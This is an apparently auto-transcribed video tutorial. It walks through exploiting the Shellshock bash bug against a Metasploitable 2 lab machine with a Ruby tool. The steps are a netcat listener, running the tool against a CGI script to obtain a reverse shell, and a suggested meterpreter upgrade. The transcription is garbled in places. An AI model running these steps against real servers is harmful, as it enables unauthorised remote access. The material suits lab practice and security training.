Hey guys, in this video I'm gonna show you guys a tool, which can be used to exploit shellshock vulnerabilities within minutes. This is a really powerful tool, it's called as bad bash. It's a CVE 2014 exploit tool. So the basic version, it only checks for like the HTTP CGI site, and provides a Netcat route virtual on port 1234. So there's also like other versions, which you can like use and get more extreme axes. But in this case, we just need like an access back like a connection back or reverse shell, so this will do the job.

The tool is only intended as a proof of concept and tested has only like limited functionality. It uses a delay to check if a system is vulnerable. So if you notice it hanging while you're using it to check a given system, then that means you have some passion to do. You're going to use only easily install this because it's an open source. Perhaps I can just type in You can just get it from GitHub, you can just do get clone. And thing, it's the website is HTTPS, just go to github.com.

And then secure I think it was secure, secure us global bet ourselves before it was so secure as global. And then bash, this is what this is where you need to go. And when you type in enter, you're going to just get a clone. I already have it installed, I'm just gonna cut that already have bad bash install, it's really easy to use. All you got to do is you got to just run the command for that bash and let's first go into the directory. And I'll show you guys what is inside.

So we have a rubies. So we have a Ruby script right here. As you can see, and then just basic README directions how to use it and stuff. And since the closed command like downloads an existing get repo repo, you will just be able to find like everything that is in there automatically. And in the previous tutorial, like in the previous videos, we have already seen how we created like, like how CGI bin script works, how we can like use it to get an access point from an external browser. And as far as I remember, we did something like hack.sh script and try to access it from our local machine.

So we use our target machine as meta splittable to and we saved the script called hack dot search in hack go to search in the CGI path. And then we went to our local machine which is root root Kali. And then we went to the IP address and to that particular part, so let's actually change If it still exists, I already have a Metasploit open. So I'm just going to type if config and check for the IP address. So it's 160 719. Okay, cool.

And we're just going to go back to Kali and check if it's still available. So as you can see, this was our older one. Let's see if the new ones so it says 19210 167 and was CGI bin dash hacked.sh awesome. So it's still accessible. Now we're going to use this to do our exploitation web CGI programs that can be written in any language which can process standard input like studio and studio and Raman variables and write to like a standard output STD out so you don't. So you can always make use of that and once or like so, the web server basically What exactly was doing over there?

It will interact with all the CGI programs using the command gateway interface CGI standard as set by RFC. So this capable these poses by most modern computing computer programming languages, including the bash shell, so which is a good thing for us because in this case we're going to be exploiting the bash shell. So all our remains is to navigate with our browser just like I did with the IP address. That's it. Since by default Apache server is confident to run configure to run CGI scripts from that particular directory CGI bin directory. You can always just access it all as CGI bin you don't have to type the entire thing you don't have to type dash user live CGI bin you don't have to type this entire thing you just type how we accessed before we just type CGI bin.

So now we're going to do is we want to we want to start up a listener on our Kali Linux machine which is our attacker machine and Try to get a connection. So let's do it by just typing nc lvp. version, and then our port. So I'm going to be picking 1234. Because bad batch automatically has it set up a TCP connection back forth and 1234 ports, I'm going to do the same thing. I'm going to open up a listener and see if there's any action happening in the background.

There's any battle grabbing happening. And now just enter and open up another shell. And now we're going to use our bash script, which is our Ruby script. Since it's a Ruby script I'm going to be going with so I'm going to be actually so let me show you so I'm going to be using this particular thing right here. So just type Ruby and bad bash.rb and our target machine which is dash t just have Tashi, which is um, this is for our target machine, which was 192 Eric our meta splittable two machines 1921680 167 I remember and then our path so like I said, we don't have to type that entire thing user like Ben and everything you can just type CGI bin and our scripts name which was hag.sh. And and then close it up.

And then we're gonna put our destination dash t, which is our local machine. So let's see what our Cali the next IP is. It's 168 Okay, cool. So 192168 so that's our destination IP and then close it up. Well, I didn't open it so open and then close it in hyphens and just enter and see if it is vulnerable then it will show you that the target is vulnerable. Just wait for a minute.

Check. Perfect so as you can see connected to our local machine from the meta splittable to and as you can see here to the target is vulnerable. So it literally took like less than five minutes to do this particular thing like literally like less than three minutes with this tool. So it's really efficient tool, you don't have to worry about sending an HTTP request or using Metasploit Framework, you can directly do it from your Kali just by installing this and it's highly likely that it's going to work so we can check the ID you can check the IP address of our root. Now for Metasploit able to machine in case it's in case it is working, then it should be on 67 which is our target machine. So that's it.

That's one simple way to do it. And if you guys want to get the metal printer shell on it, like I said in the first video, you can always just do the upgrade your normal commercial which is this right here to a meterpreter shell using that so you can use some simple tool and then expand it in the Want to be? Well I hope you enjoyed this video. We'll see you in the next one.